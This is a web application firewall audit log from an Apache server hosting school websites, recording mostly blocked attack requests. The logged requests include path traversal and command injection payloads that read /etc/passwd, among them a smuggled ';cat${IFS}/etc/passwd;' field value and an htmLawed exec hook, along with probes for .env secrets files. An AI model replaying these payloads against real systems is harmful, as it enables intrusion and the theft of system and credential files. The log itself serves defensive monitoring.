CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd3bd58-Z-- --23a33f5a-A-- [04/Jun/2025:15:42:57 +0700] aEAHEdhPZJx8OfNaLCq8-QAAAMw 103.236.140.4 39258 103.236.140.4 8181 --23a33f5a-B-- POST /maint/index.php?packages HTTP/1.0 Referer: up.smkn22jakarta.sch.id/maint/index.php?packages Host: up.smkn22jakarta.sch.id Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 160 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Content-Type: application/x-www-form-urlencoded --23a33f5a-C-- xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages --23a33f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a33f5a-E-- --23a33f5a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/index.php?packages"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577532581 2106 (- - -) Stopwatch2: 1749026577532581 2106; combined=904, p1=442, p2=434, p3=0, p4=0, p5=27, sr=104, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a33f5a-Z-- --0de9c920-A-- [04/Jun/2025:15:42:57 +0700] aEAHETNXNn6zAsHj7JCYmgAAAEk 103.236.140.4 39260 103.236.140.4 8181 --0de9c920-B-- GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Accept: */* Accept-Language: en --0de9c920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0de9c920-E-- --0de9c920-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /poc.jsp?cmd=cat+%2Fetc%2Fpasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577568890 1735 (- - -) Stopwatch2: 1749026577568890 1735; combined=543, p1=385, p2=122, p3=0, p4=0, p5=36, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0de9c920-Z-- --42655f1e-A-- [04/Jun/2025:15:42:57 +0700] aEAHEV_DvM40jZomoksDKwAAAA8 103.236.140.4 39262 103.236.140.4 8181 --42655f1e-B-- GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.0 Referer: up.smkn22jakarta.sch.id/maint/index.php?packages Host: up.smkn22jakarta.sch.id Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= --42655f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42655f1e-E-- --42655f1e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577600308 1784 (- - -) Stopwatch2: 1749026577600308 1784; combined=555, p1=338, p2=194, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42655f1e-Z-- --33f2201f-A-- [04/Jun/2025:15:50:21 +0700] aEAIzV_DvM40jZomoksEvgAAAAs 103.236.140.4 45594 103.236.140.4 8181 --33f2201f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.180.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.180.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --33f2201f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33f2201f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749027021681550 707 (- - -) Stopwatch2: 1749027021681550 707; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33f2201f-Z-- --ed2f7043-A-- [04/Jun/2025:15:52:01 +0700] aEAJMZLmnxTwEPX7IuZMTwAAAIo 103.236.140.4 47574 103.236.140.4 8181 --ed2f7043-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ed2f7043-C-- !¸examplecom --ed2f7043-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed2f7043-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027121545674 4389 (- - -) Stopwatch2: 1749027121545674 4389; combined=2754, p1=649, p2=2002, p3=32, p4=38, p5=33, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed2f7043-Z-- --b3d18634-A-- [04/Jun/2025:15:52:02 +0700] aEAJMjNXNn6zAsHj7JCanAAAAEA 103.236.140.4 47588 103.236.140.4 8181 --b3d18634-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --b3d18634-C-- Äxexamplecom --b3d18634-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d18634-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027122195086 3939 (- - -) Stopwatch2: 1749027122195086 3939; combined=2554, p1=549, p2=1902, p3=32, p4=35, p5=36, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d18634-Z-- --e6e09e67-A-- [04/Jun/2025:15:52:03 +0700] aEAJM1_DvM40jZomoksE-QAAAAM 103.236.140.4 47614 103.236.140.4 8181 --e6e09e67-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --e6e09e67-C-- “&examplecom --e6e09e67-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e09e67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027123242851 4172 (- - -) Stopwatch2: 1749027123242851 4172; combined=3114, p1=661, p2=2348, p3=35, p4=40, p5=29, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e09e67-Z-- --d0624966-A-- [04/Jun/2025:15:52:03 +0700] aEAJM1_DvM40jZomoksE_AAAABI 103.236.140.4 47632 103.236.140.4 8181 --d0624966-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d0624966-C-- ÂÄexamplecom --d0624966-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0624966-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027123842523 3857 (- - -) Stopwatch2: 1749027123842523 3857; combined=2501, p1=526, p2=1880, p3=31, p4=36, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0624966-Z-- --a0494d3b-A-- [04/Jun/2025:15:52:04 +0700] aEAJNDNXNn6zAsHj7JCanwAAAFA 103.236.140.4 47654 103.236.140.4 8181 --a0494d3b-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a0494d3b-C-- ¨›examplecom --a0494d3b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0494d3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027124446245 3089 (- - -) Stopwatch2: 1749027124446245 3089; combined=1996, p1=451, p2=1477, p3=21, p4=23, p5=24, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0494d3b-Z-- --d4bb4c29-A-- [04/Jun/2025:15:52:05 +0700] aEAJNTNXNn6zAsHj7JCaogAAAEw 103.236.140.4 47680 103.236.140.4 8181 --d4bb4c29-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d4bb4c29-C-- ¿'examplecom --d4bb4c29-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4bb4c29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027125444297 3049 (- - -) Stopwatch2: 1749027125444297 3049; combined=1982, p1=435, p2=1477, p3=21, p4=24, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4bb4c29-Z-- --9391cb33-A-- [04/Jun/2025:15:52:06 +0700] aEAJNjNXNn6zAsHj7JCapQAAAFY 103.236.140.4 47706 103.236.140.4 8181 --9391cb33-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9391cb33-C-- Pexamplecom --9391cb33-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --9391cb33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027126440198 4184 (- - -) Stopwatch2: 1749027126440198 4184; combined=2541, p1=531, p2=1906, p3=37, p4=38, p5=28, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9391cb33-Z-- --6b77b15c-A-- [04/Jun/2025:15:52:07 +0700] aEAJNzNXNn6zAsHj7JCaqAAAAFU 103.236.140.4 47748 103.236.140.4 8181 --6b77b15c-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --6b77b15c-C-- ¹›examplecom --6b77b15c-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --6b77b15c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027127430329 4810 (- - -) Stopwatch2: 1749027127430329 4810; combined=2950, p1=602, p2=2226, p3=44, p4=42, p5=35, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b77b15c-Z-- --708bf90d-A-- [04/Jun/2025:15:58:02 +0700] aEAKml_DvM40jZomoksGGQAAAAY 103.236.140.4 55774 103.236.140.4 8181 --708bf90d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --708bf90d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --708bf90d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749027482360629 601 (- - -) Stopwatch2: 1749027482360629 601; combined=223, p1=189, p2=0, p3=0, p4=0, p5=33, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708bf90d-Z-- --eb741c66-A-- [04/Jun/2025:16:59:32 +0700] aEAZBF_DvM40jZomoksXiQAAABA 103.236.140.4 46896 103.236.140.4 8181 --eb741c66-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 39 User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 162529246 --eb741c66-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --eb741c66-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb741c66-E-- --eb741c66-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749031172689024 4246 (- - -) Stopwatch2: 1749031172689024 4246; combined=2492, p1=486, p2=1972, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb741c66-Z-- --14f37566-A-- [04/Jun/2025:17:09:13 +0700] aEAbSV_DvM40jZomoksarAAAABQ 103.236.140.4 32986 103.236.140.4 8181 --14f37566-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --14f37566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14f37566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749031753034893 687 (- - -) Stopwatch2: 1749031753034893 687; combined=300, p1=269, p2=0, p3=0, p4=0, p5=31, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14f37566-Z-- --a09ac950-A-- [04/Jun/2025:17:18:03 +0700] aEAdWzNXNn6zAsHj7JC02gAAAFA 103.236.140.4 44992 103.236.140.4 8181 --a09ac950-B-- GET /webadmin/pkg?command= HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/102.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 173575938 --a09ac950-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a09ac950-E-- --a09ac950-H-- Message: Access denied with code 403 (phase 2). Matched phrase "document.cookie" at ARGS:command. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "56"] [id "212340"] [rev "5"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: document.cookie found within ARGS:command: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749032283496920 2364 (- - -) Stopwatch2: 1749032283496920 2364; combined=996, p1=384, p2=570, p3=0, p4=0, p5=42, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a09ac950-Z-- --4d54df6c-A-- [04/Jun/2025:17:38:19 +0700] aEAiG9hPZJx8OfNaLCrrmAAAANY 103.236.140.4 41914 103.236.140.4 8181 --4d54df6c-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/117.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173640298 --4d54df6c-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --4d54df6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d54df6c-E-- --4d54df6c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749033499388697 2086 (- - -) Stopwatch2: 1749033499388697 2086; combined=645, p1=425, p2=175, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d54df6c-Z-- --aa26977a-A-- [04/Jun/2025:17:39:32 +0700] 